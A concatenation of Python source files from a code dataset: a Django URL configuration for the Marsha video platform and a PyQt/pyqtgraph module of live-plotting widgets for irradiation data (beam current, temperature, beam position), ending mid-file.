"name": "test_certificate",
"passphrase": "<PASSWORD>",
}
params.update(additional_properties)
module = FakeModule(**params)
return module
|
StarcoderdataPython
|
6463649
|
"""Marsha URLs configuration."""
from django.conf import settings
from django.urls import include, path, re_path
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.routers import DefaultRouter
from rest_framework.schemas import get_schema_view
from marsha.core import models
from marsha.core.admin import admin_site
from marsha.core.api import (
DocumentViewSet,
LiveRegistrationViewSet,
OrganizationViewSet,
PlaylistViewSet,
SharedLiveMediaViewSet,
ThumbnailViewSet,
TimedTextTrackViewSet,
UserViewSet,
VideoViewSet,
XAPIStatementView,
pairing_challenge,
update_state,
)
from marsha.core.views import (
DocumentView,
LTIRespondView,
LTISelectView,
SiteView,
VideoView,
)
from marsha.development.api import local_document_upload, local_video_upload
router = DefaultRouter()
router.register(models.Video.RESOURCE_NAME, VideoViewSet, basename="videos")
router.register(models.Document.RESOURCE_NAME, DocumentViewSet, basename="documents")
router.register(
models.LiveRegistration.RESOURCE_NAME,
LiveRegistrationViewSet,
basename="live_registrations",
)
router.register(
models.TimedTextTrack.RESOURCE_NAME,
TimedTextTrackViewSet,
basename="timed_text_tracks",
)
router.register(models.Thumbnail.RESOURCE_NAME, ThumbnailViewSet, basename="thumbnails")
router.register("organizations", OrganizationViewSet, basename="organizations")
router.register("playlists", PlaylistViewSet, basename="playlists")
router.register("users", UserViewSet, basename="users")
router.register(
models.SharedLiveMedia.RESOURCE_NAME,
SharedLiveMediaViewSet,
basename="sharedlivemedias",
)
urlpatterns = [
# Admin
path(f"{admin_site.name}/", admin_site.urls),
# LTI
path("lti/select/", LTISelectView.as_view(), name="select_lti_view"),
path("lti/respond/", LTIRespondView.as_view(), name="respond_lti_view"),
path("lti/videos/<uuid:uuid>", VideoView.as_view(), name="video_lti_view"),
path("lti/documents/<uuid:uuid>", DocumentView.as_view(), name="document_lti_view"),
# Public resources
path("videos/<uuid:uuid>", VideoView.as_view(), name="video_public"),
path("documents/<uuid:uuid>", DocumentView.as_view(), name="document_public"),
# API
path("api/pairing-challenge", pairing_challenge, name="pairing_challenge"),
path("api/update-state", update_state, name="update_state"),
path(
"api/schema",
get_schema_view(title="Marsha API", renderer_classes=[CoreJSONRenderer]),
name="schema",
),
path("api/", include(router.urls)),
re_path(
r"^xapi/(?P<resource>video|document)/$",
XAPIStatementView.as_view(),
name="xapi",
),
]
if settings.BBB_ENABLED:
urlpatterns += [path("", include("marsha.bbb.urls"))]
if settings.DEBUG:
urlpatterns += [path("", include("marsha.development.urls"))]
if "dummy" in settings.STORAGE_BACKEND:
urlpatterns += [
path(
"api/video-upload/<uuid:uuid>",
local_video_upload,
name="local-video-upload",
),
path(
"api/document-upload/<uuid:uuid>",
local_document_upload,
name="local-document-upload",
),
]
urlpatterns += [
re_path(".*", SiteView.as_view(), name="site"),
]
|
StarcoderdataPython
|
1643202
|
<gh_stars>0
import logging
import pyqtgraph as pg
import numpy as np
from matplotlib import cm as mcmaps, colors as mcolors
from PyQt5 import QtWidgets, QtCore, QtGui
from collections import OrderedDict
from irrad_control.gui.widgets.util_widgets import GridContainer
# Matplotlib default colors
_MPL_COLORS = [tuple(round(255 * v) for v in rgb) for rgb in [mcolors.to_rgb(def_col) for def_col in mcolors.TABLEAU_COLORS]]
_BOLD_FONT = QtGui.QFont()
_BOLD_FONT.setBold(True)
class PlotWindow(QtWidgets.QMainWindow):
"""Window which only shows a PlotWidget as its central widget."""
# PyQt signal which is emitted when the window closes
closeWin = QtCore.pyqtSignal()
def __init__(self, plot, parent=None):
super(PlotWindow, self).__init__(parent)
# PlotWidget to display in window
self.pw = plot
# Window appearance settings
self.setWindowTitle(type(plot).__name__)
self.screen = QtWidgets.QDesktopWidget().screenGeometry()
self.setMinimumSize(0.25 * self.screen.width(), 0.25 * self.screen.height())
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
# Set plot as central widget
self.setCentralWidget(self.pw)
def closeEvent(self, _):
self.closeWin.emit()
self.close()
class PlotWrapperWidget(QtWidgets.QWidget):
"""Widget that wraps PlotWidgets and implements some additional features which allow to control the PlotWidgets content.
Also adds button to show the respective PlotWidget in a QMainWindow"""
def __init__(self, plot=None, parent=None):
super(PlotWrapperWidget, self).__init__(parent=parent)
# Set a reasonable minimum size
self.setMinimumSize(300, 300)
# PlotWidget to display; set size policy
self.pw = plot
self.pw.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
self.external_win = None
# Main layout and sub layout for e.g. checkboxes which allow to show/hide curves in PlotWidget etc.
self.setLayout(QtWidgets.QVBoxLayout())
self.plot_options = GridContainer(name='Plot options' if not hasattr(self.pw, 'name') else '{} options'.format(self.pw.name))
# Setup widget if class instance was initialized with plot
if self.pw is not None:
self._setup_widget()
def _setup_widget(self):
"""Setup of the additional widgets to control the appearance and content of the PlotWidget"""
_sub_layout_1 = QtWidgets.QHBoxLayout()
_sub_layout_1.setSpacing(self.plot_options.grid.verticalSpacing())
_sub_layout_2 = QtWidgets.QHBoxLayout()
_sub_layout_2.setSpacing(self.plot_options.grid.verticalSpacing())
# Create checkboxes in order to show/hide curves in plots
if hasattr(self.pw, 'show_data') and hasattr(self.pw, 'curves'):
_sub_layout_2.addWidget(QtWidgets.QLabel('Toggle curve{}:'.format('s' if len(self.pw.curves) > 1 else '')))
all_checkbox = QtWidgets.QCheckBox('All')
all_checkbox.setFont(_BOLD_FONT)
all_checkbox.setChecked(True)
_sub_layout_2.addWidget(all_checkbox)
for curve in self.pw.curves:
checkbox = QtWidgets.QCheckBox(curve)
checkbox.setChecked(True)
all_checkbox.stateChanged.connect(lambda _, cbx=checkbox: cbx.setChecked(all_checkbox.isChecked()))
checkbox.stateChanged.connect(lambda v, n=checkbox.text(): self.pw.show_data(n, bool(v)))
_sub_layout_2.addWidget(checkbox)
_sub_layout_1.addWidget(QtWidgets.QLabel('Features:'))
_sub_layout_1.addStretch()
# Add possibility to en/disable showing curve statistics
if hasattr(self.pw, 'enable_stats'):
stats_checkbox = QtWidgets.QCheckBox('Enable statistics')
stats_checkbox.setChecked(self.pw._show_stats)
stats_checkbox.stateChanged.connect(lambda state: self.pw.enable_stats(bool(state)))
stats_checkbox.setToolTip("Show curve statistics while hovering / clicking curve(s)")
_sub_layout_1.addWidget(stats_checkbox)
# Whenever x axis is time add spinbox to change time period for which data is shown
if hasattr(self.pw, 'update_period'):
# Add horizontal helper line if we're looking at scrolling data plot
unit = self.pw.plt.getAxis('left').labelUnits or '[?]'
label = self.pw.plt.getAxis('left').labelText or 'Value'
self.helper_line = pg.InfiniteLine(angle=0, label=label + ': {value:.2E} ' + unit)
self.helper_line.setMovable(True)
self.helper_line.setPen(color='w', style=pg.QtCore.Qt.DashLine, width=2)
if hasattr(self.pw, 'unitChanged'):
self.pw.unitChanged.connect(lambda u: setattr(self.helper_line.label, 'format', self.pw.plt.getAxis('left').labelText + ': {value:.2E} ' + u))
self.pw.unitChanged.connect(self.helper_line.label.valueChanged)
hl_checkbox = QtWidgets.QCheckBox('Show helper line')
hl_checkbox.stateChanged.connect(
lambda v: self.pw.plt.addItem(self.helper_line) if v else self.pw.plt.removeItem(self.helper_line))
_sub_layout_1.addWidget(hl_checkbox)
# Spinbox for period to be shown on x axis
spinbox_period = QtWidgets.QSpinBox()
spinbox_period.setRange(1, 3600)
spinbox_period.setValue(self.pw._period)
spinbox_period.setPrefix('Time period: ')
spinbox_period.setSuffix(' s')
spinbox_period.valueChanged.connect(lambda v: self.pw.update_period(v))
_sub_layout_1.addWidget(spinbox_period)
if hasattr(self.pw, 'update_refresh_rate'):
# Spinbox for plot refresh rate
spinbox_refresh = QtWidgets.QSpinBox()
spinbox_refresh.setRange(0, 60)
spinbox_refresh.setValue(int(1000 / self.pw.refresh_timer.interval()))
spinbox_refresh.setPrefix('Refresh rate: ')
spinbox_refresh.setSuffix(' Hz')
spinbox_refresh.valueChanged.connect(lambda v: self.pw.update_refresh_rate(v))
_sub_layout_1.addWidget(spinbox_refresh)
# Button to move self.pw to PlotWindow instance
self.btn_open = QtWidgets.QPushButton()
self.btn_open.setIcon(self.btn_open.style().standardIcon(QtWidgets.QStyle.SP_TitleBarMaxButton))
self.btn_open.setToolTip('Open plot in window')
self.btn_open.setFixedSize(25, 25)
self.btn_open.clicked.connect(self.move_to_win)
self.btn_open.clicked.connect(lambda: self.layout().insertStretch(1))
self.btn_open.clicked.connect(lambda: self.btn_open.setEnabled(False))
self.btn_open.clicked.connect(lambda: self.btn_close.setEnabled(True))
# Button to close self.pw to PlotWindow instance
self.btn_close = QtWidgets.QPushButton()
self.btn_close.setIcon(self.btn_open.style().standardIcon(QtWidgets.QStyle.SP_TitleBarCloseButton))
self.btn_close.setToolTip('Close plot in window')
self.btn_close.setFixedSize(25, 25)
self.btn_close.setEnabled(False)
self.btn_close.clicked.connect(lambda: self.btn_close.setEnabled(False))
self.btn_close.clicked.connect(lambda: self.external_win.close())
_sub_layout_1.addWidget(self.btn_open)
_sub_layout_1.addWidget(self.btn_close)
self.plot_options.add_layout(_sub_layout_1)
self.plot_options.add_layout(_sub_layout_2)
# Insert everything into main layout
self.layout().insertWidget(0, self.plot_options)
self.layout().insertWidget(1, self.pw)
def set_plot(self, plot):
"""Set PlotWidget and set up widgets"""
self.pw = plot
self._setup_widget()
def move_to_win(self):
"""Move PlotWidget to PlotWindow. When window is closed, transfer widget back to self"""
self.external_win = PlotWindow(plot=self.pw, parent=self)
self.external_win.closeWin.connect(lambda: self.layout().takeAt(1))
self.external_win.closeWin.connect(lambda: self.layout().insertWidget(1, self.pw))
self.external_win.closeWin.connect(lambda: self.btn_open.setEnabled(True))
self.external_win.show()
class MultiPlotWidget(QtWidgets.QScrollArea):
"""Widget to display multiple plot in a matrix"""
def __init__(self, plots=None, parent=None):
super(MultiPlotWidget, self).__init__(parent)
# Some basic settings
self.setFrameShape(QtWidgets.QFrame.NoFrame)
self.setWidgetResizable(True)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
# Main widget is a vertical splitter
self.main_splitter = QtWidgets.QSplitter()
self.main_splitter.setOrientation(QtCore.Qt.Vertical)
self.main_splitter.setChildrenCollapsible(False)
# Colors
p, r = self.palette(), self.backgroundRole()
p.setColor(r, self.main_splitter.palette().color(QtGui.QPalette.AlternateBase))
self.setPalette(p)
self.setAutoFillBackground(True)
# Set main widget
self.setWidget(self.main_splitter)
# Add initial plots
if plots is not None:
if any(isinstance(x, (list, tuple)) for x in plots):
self.add_plot_matrix(plots)
else:
self.add_plots(plots)
def add_plots(self, plots):
# If we only add one plot; just add to layout
if isinstance(plots, QtWidgets.QWidget):
self.main_splitter.addWidget(plots)
# *plots* is an iterable of plots
elif isinstance(plots, (list, tuple)):
# Create a horizontal splitter
splitter = QtWidgets.QSplitter()
splitter.setOrientation(QtCore.Qt.Horizontal)
splitter.setChildrenCollapsible(False)
# Loop over individual plots and add them
for sub_plot in plots:
splitter.addWidget(sub_plot)
self.main_splitter.addWidget(splitter) # Add to main layout
splitter.setSizes([self.width() / len(plots)] * len(plots)) # Same width
else:
raise TypeError("*plot* must be individual or iterable of plot widgets")
def add_plot_matrix(self, plot_matrix):
if not isinstance(plot_matrix, (list, tuple)):
raise ValueError("*plot* needs to be 2-dimensional iterable containing plots / QWidgets")
for sub_plots in plot_matrix:
self.add_plots(sub_plots)
def wheelEvent(self, ev):
"""Override mousewheel; plots use mouse wheel event for zoom"""
if ev.type() == QtCore.QEvent.Wheel:
ev.ignore()
class IrradPlotWidget(pg.PlotWidget):
"""Base class for plot widgets"""
def __init__(self, refresh_rate=20, parent=None):
super(IrradPlotWidget, self).__init__(parent)
# Actual plotitem
self.plt = self.getPlotItem()
# Store curves to be displayed and active curves under cursor
self.curves = OrderedDict()
self.active_curves = OrderedDict() # Store channel which is currently active (e.g. statistics are shown)
# Hold data
self._data = OrderedDict()
self._data_is_set = False
# Timer for refreshing plots with a given time interval to avoid unnecessary updating / high load
self.refresh_timer = QtCore.QTimer()
# Connect timeout signal of refresh timer to refresh_plot method
self.refresh_timer.timeout.connect(self.refresh_plot)
# Start timer
self.refresh_timer.start(int(1000 / refresh_rate))
# Hold buttons which are inside the plot
self._in_plot_btns = []
# TextItem for showing statistic of curves; set invisible first, only show on user request
self.stats_text = pg.TextItem(text='No statistics to show', border=pg.mkPen(color='w', style=pg.QtCore.Qt.SolidLine))
self._static_stats_text = False
self._show_stats = False # Show statistics of curves
self.stats_text.setVisible(False)
def enable_stats(self, enable=True):
def _manage_signals(sig, slot, connect):
try:
sig.connect(slot) if connect else sig.disconnect(slot)
except Exception:
logging.error('Signal {} not {} slot {}'.format(repr(sig), '{}connected {}'.format(*('', 'to') if connect else ('dis', 'from')), repr(slot)))
# Set flag
self._show_stats = enable
# Signals
_manage_signals(sig=self.plt.scene().sigMouseMoved, slot=self._set_active_curves, connect=enable)
_manage_signals(sig=self.plt.scene().sigMouseClicked, slot=self._set_active_curves, connect=enable)
_manage_signals(sig=self.plt.scene().sigMouseClicked, slot=self._toggle_static_stat_text, connect=enable)
# Add/remove stats text from plt
self.stats_text.setParentItem(self.plt if enable else None)
if not enable:
self.stats_text.setVisible(enable)
def _toggle_static_stat_text(self, click):
self._static_stats_text = not self._static_stats_text if any(self.active_curves.values()) else False
self._set_active_curves(click)
def _set_active_curves(self, event):
"""Method updating which curves are active; active curves statistics are shown on plot"""
if self._static_stats_text:
return
# Check whether it was a click or move
click = hasattr(event, 'button')
event_pos = event if not click else event.scenePos()
# Get mouse coordinates in the coordinate system of the plot
pos = self.plt.vb.mapSceneToView(event_pos)
# Update current active curves
for curve in self.curves:
if isinstance(self.curves[curve], pg.PlotCurveItem):
self.active_curves[curve] = self.curves[curve].mouseShape().contains(pos) or self.curves[curve].getPath().contains(pos)
elif isinstance(self.curves[curve], CrosshairItem):
self.active_curves[curve] = True if self.curves[curve].intersect.pointsAt(pos) else False
elif isinstance(self.curves[curve], pg.ImageItem):
self.active_curves[curve] = self.plt.scene().sceneRect().contains(pos) and self.curves[curve] in self.plt.items
else:
self.active_curves[curve] = False
# We have active curves
if any(self.active_curves.values()):
self.stats_text.setPos(event_pos)
self.stats_text.setVisible(True)
else:
self.stats_text.setVisible(False)
def _setup_plot(self):
raise NotImplementedError('Please implement a _setup_plot method')
def set_data(self):
raise NotImplementedError('Please implement a set_data method')
def refresh_plot(self):
raise NotImplementedError('Please implement a refresh_plot method')
def update_refresh_rate(self, refresh_rate):
"""Update rate with which the plot is drawn"""
if refresh_rate == 0:
logging.warning("{} display stopped. Data is not being buffered while not being displayed.".format(type(self).__name__))
self.refresh_timer.stop() # Stops QTimer
else:
self.refresh_timer.start(int(1000 / refresh_rate)) # Restarts QTimer with new updated interval
def add_plot_button(self, btn):
"""Adds an in-plot button to the plotitem"""
if btn not in self._in_plot_btns:
self._in_plot_btns.append(btn)
self._update_button_pos()
def _update_button_pos(self, btn_spacing=20, x_offset=70, y_offset=5):
btn_pos_x = x_offset
btn_pos_y = y_offset
is_visible = [b.isVisible() for b in self._in_plot_btns]
for i, _btn in enumerate(self._in_plot_btns):
# The first button will always be set to upper left corner
# Check if the previous button was visible; if not, place at current position
if i != 0 and is_visible[i - 1]:
btn_pos_x += self._in_plot_btns[i - 1].boundingRect().width() + btn_spacing
# Place button
_btn.setPos(btn_pos_x, btn_pos_y)
def show_data(self, curve=None, show=True):
"""Show/hide the data of curve in PlotItem. If *curve* is None, all curves are shown/hidden."""
if curve is not None and curve not in self.curves:
logging.error('{} data not in graph. Current graphs: {}'.format(curve, ','.join(self.curves.keys())))
return
_curves = [curve] if curve is not None else self.curves.keys()
for _cu in _curves:
if isinstance(self.curves[_cu], CrosshairItem):
self.curves[_cu].add_to_plot() if show else self.curves[_cu].remove_from_plot()
self.curves[_cu].add_to_legend() if show else self.curves[_cu].remove_from_legend()
else:
if not any(isinstance(self.curves[_cu], x) for x in (pg.InfiniteLine, pg.ImageItem)):
self.legend.addItem(self.curves[_cu], _cu) if show else self.legend.removeItem(_cu)
self.plt.addItem(self.curves[_cu]) if show else self.plt.removeItem(self.curves[_cu])
class ScrollingIrradDataPlot(IrradPlotWidget):
"""PlotWidget which displays a set of irradiation data curves over time"""
def __init__(self, channels, units=None, period=60, refresh_rate=20, colors=_MPL_COLORS, name=None, parent=None):
super(ScrollingIrradDataPlot, self).__init__(refresh_rate=refresh_rate, parent=parent)
self.channels = channels
self.units = units
self.name = name
# Attributes for data visualization
self._time = None # array for timestamps
self._start = 0 # starting timestamp of each cycle
self._timestamp = 0 # timestamp of each incoming data
self._offset = 0 # offset for increasing cycle time
self._idx = 0 # cycling index through time axis
self._period = period # amount of time for which to display data; default, displaying last 60 seconds of data
self._filled = False # bool to see whether the array has been filled
self._drate = None # data rate
self._colors = colors # Colors to plot curves in
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
"""Setting up the plot. The Actual plot (self.plt) is the underlying PlotItem of the respective PlotWidget"""
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setLabel('left', text='Signal', units='V' if self.units is None else self.units['left'])
# Title
self.plt.setTitle('' if self.name is None else self.name)
# Additional axis if specified
if 'right' in self.units:
self.plt.setLabel('right', text='Signal', units=self.units['right'])
# X-axis is time
self.plt.setLabel('bottom', text='Time', units='s')
self.plt.showGrid(x=True, y=True, alpha=0.66)
self.plt.setLimits(xMax=0)
self.enable_stats()
# Make legend entries for curves
self.legend = pg.LegendItem(offset=(80, -50))
self.legend.setParentItem(self.plt)
# Make OrderedDict of curves and dict to hold active value indicating whether the user interacts with the curve
for i, ch in enumerate(self.channels):
self.curves[ch] = pg.PlotCurveItem(pen=self._colors[i % len(self._colors)])
self.curves[ch].opts['mouseWidth'] = 20 # Needed for indication of active curves
self.show_data(ch) # Show data and legend
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
# If data is not yet filled; mask all NaN values and invert bool mask
mask = None if self._filled else ~np.isnan(self._data[curve])
# Get stats
if mask is None:
mean, std, entries = self._data[curve].mean(), self._data[curve].std(), self._data[curve].shape[0]
else:
mean, std, entries = self._data[curve][mask].mean(), self._data[curve][mask].std(), self._data[curve][mask].shape[0]
current_stat_text += ' '
current_stat_text += curve + u': ({:.2E} \u00B1 {:.2E}) {} (#{})'.format(mean, std, self.plt.getAxis('left').labelUnits, entries)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100) if n_actives != 1 else self.curves[current_actives[0]].opts['pen'].color()
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def set_data(self, data):
"""Set the data of the plot. Input data is data plus meta data"""
# Meta data and data
_meta, _data = data['meta'], data['data']
# Store timestamp of current data
self._timestamp = _meta['timestamp']
# Set data rate if available
if 'data_rate' in _meta:
self._drate = _meta['data_rate']
# Get data rate from data in order to set time axis
if self._time is None:
if 'data_rate' in _meta:
self._drate = _meta['data_rate']
shape = int(round(self._drate) * self._period + 1)
self._time = np.full(shape=shape, fill_value=np.nan)
for ch in self.channels:
self._data[ch] = np.full(shape=shape, fill_value=np.nan)
self._data_is_set = True
# Fill data
else:
# If we made one cycle, start again from the beginning
if self._idx == self._time.shape[0]:
self._idx = 0
self._filled = True
# If we start a new cycle, set new start timestamp and offset
if self._idx == 0:
self._start = self._timestamp
self._offset = 0
# Set time axis
self._time[self._idx] = self._start - self._timestamp + self._offset
# Increment index
self._idx += 1
# Set data in curves
for ch in _data:
# Shift data to the right and set 0th element
self._data[ch][1:] = self._data[ch][:-1]
self._data[ch][0] = _data[ch]
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for curve in self.curves:
# Update data of curves
if not self._filled:
mask = ~np.isnan(self._data[curve]) # Mask all NaN values and invert bool mask
self.curves[curve].setData(self._time[mask], self._data[curve][mask])
else:
self.curves[curve].setData(self._time, self._data[curve])
# Only calculate statistics if we look at them
if self._show_stats:
self._set_stats()
def update_axis_scale(self, scale, axis='left'):
"""Update the scale of current axis"""
self.plt.getAxis(axis).setScale(scale=scale)
def update_period(self, period):
"""Update the period of time for which the data is displayed in seconds"""
# Update attribute
self._period = period
# Create new data and time
shape = int(round(self._drate) * self._period + 1)
new_data = OrderedDict([(ch, np.full(shape=shape, fill_value=np.nan)) for ch in self.channels])
new_time = np.full(shape=shape, fill_value=np.nan)
# Check whether new time and data hold more or less indices
decreased = self._time.shape[0] >= shape
if decreased:
# Cut time axis
new_time = self._time[:shape]
# If filled before, go to 0, else go to 0 if current index is bigger than new shape
if self._filled:
self._idx = 0
else:
self._idx = 0 if self._idx >= shape else self._idx
# Set wheter the array is now filled
self._filled = True if self._idx == 0 else False
else:
# Extend time axis
new_time[:self._time.shape[0]] = self._time
# If array was filled before, go to last time, set it as offset and start from last timestamp
if self._filled:
self._idx = self._time.shape[0]
self._start = self._timestamp
self._offset = self._time[-1]
self._filled = False
# Set new time and data
for ch in self.channels:
if decreased:
new_data[ch] = self._data[ch][:shape]
else:
new_data[ch][:self._data[ch].shape[0]] = self._data[ch]
# Update
self._time = new_time
self._data = new_data
class RawDataPlot(ScrollingIrradDataPlot):
"""Plot for displaying the raw data of all channels of the respective ADC over time.
Data is displayed in rolling manner over period seconds. The plot unit can be switched between Volt and Ampere"""
unitChanged = QtCore.pyqtSignal(str)
def __init__(self, daq_setup, daq_device=None, parent=None):
# Init class attributes
self.daq_setup = daq_setup
self.use_unit = 'V'
# Call __init__ of ScrollingIrradDataPlot
super(RawDataPlot, self).__init__(channels=daq_setup['devices']['adc']['channels'], units={'left': self.use_unit},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
# Make in-plot button to switch between units
unit_btn = PlotPushButton(plotitem=self.plt, text='Switch unit ({})'.format('A'))
unit_btn.clicked.connect(self.change_unit)
# Connect to signal
for con in [lambda u: self.plt.getAxis('left').setLabel(text='Signal', units=u),
lambda u: unit_btn.setText('Switch unit ({})'.format('A' if u == 'V' else 'V')),
lambda u: setattr(self, '_data', self.convert_to_unit(self._data, u))]: # convert between units
self.unitChanged.connect(con)
# Add
self.add_plot_button(unit_btn)
def change_unit(self):
self.use_unit = 'V' if self.use_unit == 'A' else 'A'
self.unitChanged.emit(self.use_unit)
def convert_to_unit(self, data, unit):
"""Method to convert raw data between Volt and Ampere"""
# Check whether data is not None
if not data:
logging.info('No data to convert')
return
res = OrderedDict()
# Loop over data and overwrite
for ch in data:
_idx = self.channels.index(ch)
# Get data, scale and type of channel
val, scale, _type = data[ch], self.daq_setup['devices']['adc']['ro_scales'][_idx], self.daq_setup['devices']['adc']['types'][_idx]
# Adjust scale in case we're looking at SEM's sum signal; in this case current is multiplied by factor of 4
scale *= 1 if _type != 'sem_sum' else 4
res[ch] = val / 5.0 * scale * 1e-9 if unit == 'A' else val * 5.0 / 1e-9 / scale
return res
def set_data(self, data):
"""Overwrite set_data method in order to show raw data in Ampere and Volt"""
# Convert voltages to currents and overwrite
if self.use_unit == 'A':
data['data'] = self.convert_to_unit(data['data'], self.use_unit)
super(RawDataPlot, self).set_data(data)
class PlotPushButton(pg.TextItem):
"""Implements a in-plot push button for a PlotItem"""
clicked = QtCore.pyqtSignal()
def __init__(self, plotitem, **kwargs):
if 'border' not in kwargs:
kwargs['border'] = pg.mkPen(color='w', style=pg.QtCore.Qt.SolidLine)
super(PlotPushButton, self).__init__(**kwargs)
self.setParentItem(plotitem)
self.setOpacity(0.7)
self.btn_area = QtCore.QRectF(self.mapToParent(self.boundingRect().topLeft()), self.mapToParent(self.boundingRect().bottomRight()))
# Connect to relevant signals
plotitem.scene().sigMouseMoved.connect(self._check_hover)
plotitem.scene().sigMouseClicked.connect(self._check_click)
def setPos(self, *args, **kwargs):
super(PlotPushButton, self).setPos(*args, **kwargs)
self.btn_area = QtCore.QRectF(self.mapToParent(self.boundingRect().topLeft()), self.mapToParent(self.boundingRect().bottomRight()))
def setFill(self, *args, **kwargs):
self.fill = pg.mkBrush(*args, **kwargs)
def _check_hover(self, evt):
if self.btn_area.contains(evt):
self.setOpacity(1.0)
else:
self.setOpacity(0.7)
def _check_click(self, b):
if self.btn_area.contains(b.scenePos()):
self.clicked.emit()
class BeamCurrentPlot(ScrollingIrradDataPlot):
"""Plot for displaying the proton beam current over time. Data is displayed in rolling manner over period seconds"""
def __init__(self, beam_current_setup=None, daq_device=None, parent=None):
# Init class attributes
self.beam_current_setup = beam_current_setup
# Call __init__ of ScrollingIrradDataPlot
super(BeamCurrentPlot, self).__init__(channels=['analog', 'digital'], units={'left': 'A', 'right': 'A'},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
self.plt.setLabel('left', text='Beam current', units='A')
self.plt.hideAxis('left')
self.plt.showAxis('right')
self.plt.setLabel('right', text='Beam current', units='A')
class TemperatureDataPlot(ScrollingIrradDataPlot):
def __init__(self, temp_setup, daq_device=None, parent=None):
self.temp_setup = temp_setup
super(TemperatureDataPlot, self).__init__(channels=temp_setup['devices']['temp'].values(), units={'right': 'C', 'left': 'C'},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
self.plt.setLabel('left', text='Temperature', units='C')
self.plt.hideAxis('left')
self.plt.showAxis('right')
self.plt.setLabel('right', text='Temperature', units='C')
class CrosshairItem:
"""This class implements three pyqtgraph items in order to display a reticle with a circle in its intersection."""
def __init__(self, color, name, intersect_symbol=None, horizontal=True, vertical=True):
if not horizontal and not vertical:
raise ValueError('At least one of horizontal or vertical beam position must be true!')
# Whether to show horizontal and vertical lines
self.horizontal = horizontal
self.vertical = vertical
# Init items needed
self.h_shift_line = pg.InfiniteLine(angle=90)
self.v_shift_line = pg.InfiniteLine(angle=0)
self.intersect = pg.ScatterPlotItem()
# Drawing style
self.h_shift_line.setPen(color=color, style=pg.QtCore.Qt.SolidLine, width=2)
self.v_shift_line.setPen(color=color, style=pg.QtCore.Qt.SolidLine, width=2)
self.intersect.setPen(color=color, style=pg.QtCore.Qt.SolidLine)
self.intersect.setBrush(color=color)
self.intersect.setSymbol('o' if intersect_symbol is None else intersect_symbol)
self.intersect.setSize(10)
# Items
self.items = []
# Add the respective lines
if self.horizontal and self.vertical:
self.items = [self.intersect, self.h_shift_line, self.v_shift_line]
elif self.horizontal:
self.items.append(self.h_shift_line)
else:
self.items.append(self.v_shift_line)
self.legend = None
self.plotitem = None
self.name = name
def set_position(self, x=None, y=None):
if x is None and y is None:
raise ValueError('Either x or y position have to be given!')
if self.horizontal:
_x = x if x is not None else self.h_shift_line.value()
if self.vertical:
_y = y if y is not None else self.v_shift_line.value()
if self.horizontal and self.vertical:
self.h_shift_line.setValue(_x)
self.v_shift_line.setValue(_y)
self.intersect.setData([_x], [_y])
elif self.horizontal:
self.h_shift_line.setValue(_x)
else:
self.v_shift_line.setValue(_y)
def set_plotitem(self, plotitem):
self.plotitem = plotitem
def set_legend(self, legend):
self.legend = legend
def add_to_plot(self, plotitem=None):
if plotitem is None and self.plotitem is None:
raise ValueError('PlotItem item needed!')
for item in self.items:
if plotitem is None:
self.plotitem.addItem(item)
else:
plotitem.addItem(item)
def add_to_legend(self, label=None, legend=None):
if legend is None and self.legend is None:
raise ValueError('LegendItem needed!')
_lbl = label if label is not None else self.name
if legend is None:
self.legend.addItem(self.intersect, _lbl)
else:
legend.addItem(self.intersect, _lbl)
def remove_from_plot(self, plotitem=None):
if plotitem is None and self.plotitem is None:
raise ValueError('PlotItem item needed!')
for item in self.items:
if plotitem is None:
self.plotitem.removeItem(item)
else:
plotitem.removeItem(item)
def remove_from_legend(self, label=None, legend=None):
if legend is None and self.legend is None:
raise ValueError('LegendItem needed!')
_lbl = label if label is not None else self.name
if legend is None:
self.legend.removeItem(_lbl)
else:
legend.removeItem(_lbl)
class BeamPositionPlot(IrradPlotWidget):
"""
Plot for displaying the beam position. The position is displayed from analog and digital data if available.
"""
def __init__(self, daq_setup, position_range=None, daq_device=None, name=None, add_hist=True, parent=None):
super(BeamPositionPlot, self).__init__(parent=parent)
# Init class attributes
self.daq_setup = daq_setup
self.ro_types = daq_setup['devices']['adc']['types']
self.daq_device = daq_device
self._plt_range = position_range if position_range else [-110, 110] * 2
self._add_hist = add_hist
self.name = name if name is not None else type(self).__name__ if self.daq_device is None else type(self).__name__ + ' ' + self.daq_device
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(self.name)
self.plt.setLabel('left', text='Vertical displacement', units='%')
self.plt.setLabel('bottom', text='Horizontal displacement', units='%')
self.plt.showGrid(x=True, y=True, alpha=0.99)
self.plt.setRange(xRange=self._plt_range[:2], yRange=self._plt_range[2:])
self.plt.setLimits(**dict([(k, self._plt_range[i]) for i, k in enumerate(('xMin', 'xMax', 'yMin', 'yMax'))]))
self.plt.hideButtons()
self.enable_stats()
v_line = self.plt.addLine(x=0, pen={'color': 'w', 'style': pg.QtCore.Qt.DashLine})
h_line = self.plt.addLine(y=0., pen={'color': 'w', 'style': pg.QtCore.Qt.DashLine})
_ = pg.InfLineLabel(line=h_line, text='Left', position=0.05, movable=False)
_ = pg.InfLineLabel(line=h_line, text='Right', position=0.95, movable=False)
_ = pg.InfLineLabel(line=v_line, text='Up', position=0.95, movable=False)
